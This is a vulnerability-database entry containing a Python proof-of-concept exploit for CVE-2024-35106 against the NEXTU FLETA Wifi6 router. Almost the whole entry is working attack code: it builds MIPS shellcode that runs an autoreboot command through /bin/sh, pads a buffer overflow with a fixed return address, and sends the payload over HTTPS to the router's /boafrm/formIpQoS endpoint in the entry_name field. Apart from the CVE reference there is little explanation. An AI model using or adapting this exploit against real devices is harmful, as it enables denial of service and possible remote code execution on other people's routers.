NEXTU FLETA Wifi6 Router DOS, Potential RCE POC

Created on 2025-02-07 03:41 and updated on 2025-02-07 03:41.

Description

from pwn import *  
from hackebds import *  


def shutdown_shell_code():  
    context.update(arch='mips', os='linux', bits=32, endian='little')  

    cmd = "/bin/sh"  
    args = ["autoreboot"]  

    asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()  
    shellcode = asm(asmcode)  
    return shellcode  


power_off_code = shutdown_shell_code()  

gap_code = (b'A') * 0x138

# This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow.
# For example I fixed address as 0x7f854710
RET_address = (b'\x10\x47\x85\x7f')  
stack_gap = (b'C') * 0x40  

print("power_off_code_length")  
print(len(power_off_code))  

final_code = power_off_code + gap_code + RET_address + stack_gap  

import socket  
import ssl  

# Server Address and Port  
HOST = '192.168.1.254'  
PORT = 443  

# Create an SSL socket for HTTPS connection
context = ssl.create_default_context()  
context.set_ciphers('HIGH:!DH:!aNULL')  
context.check_hostname = False  
context.verify_mode = ssl.CERT_NONE  

with socket.create_connection((HOST, PORT)) as sock:  
    with context.wrap_socket(sock, server_hostname=HOST) as ssock:  
            # Prepare the shellcode as bytes (e.g., b'\x00\x01\x02'; replace with appropriate values for actual use)

        # parameter for evade verification  
        send_byte = b"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=" + final_code  

        # POST request headers 
        headers = b"POST /boafrm/formIpQoS HTTP/1.1\r\n" \  
                  b"Host: " + HOST.encode('utf-8') + b"\r\n" \  
                                                     b"Content-Type: application/octet-stream\r\n" \  
                                                     b"Content-Length: " + str(len(send_byte)).encode(  
            'utf-8') + b"\r\nConnection: close\r\n\r\n"  

        # Send request (combine headers and body)  
        ssock.send(headers + send_byte)  

        # Receive response  
        response = b""  
        while True:  
            data = ssock.recv(1024)  
            if not data:  
                break  
            response += data  

            #Print response  
        print(response.decode('utf-8'))

Associated vulnerability

CVE-2024-35106

Meta

[
   {
      ref: [
         "https://github.com/laskdjlaskdj12/CVE-2024-35106-POC",
      ],
   },
]

Author

Cédric Bonhomme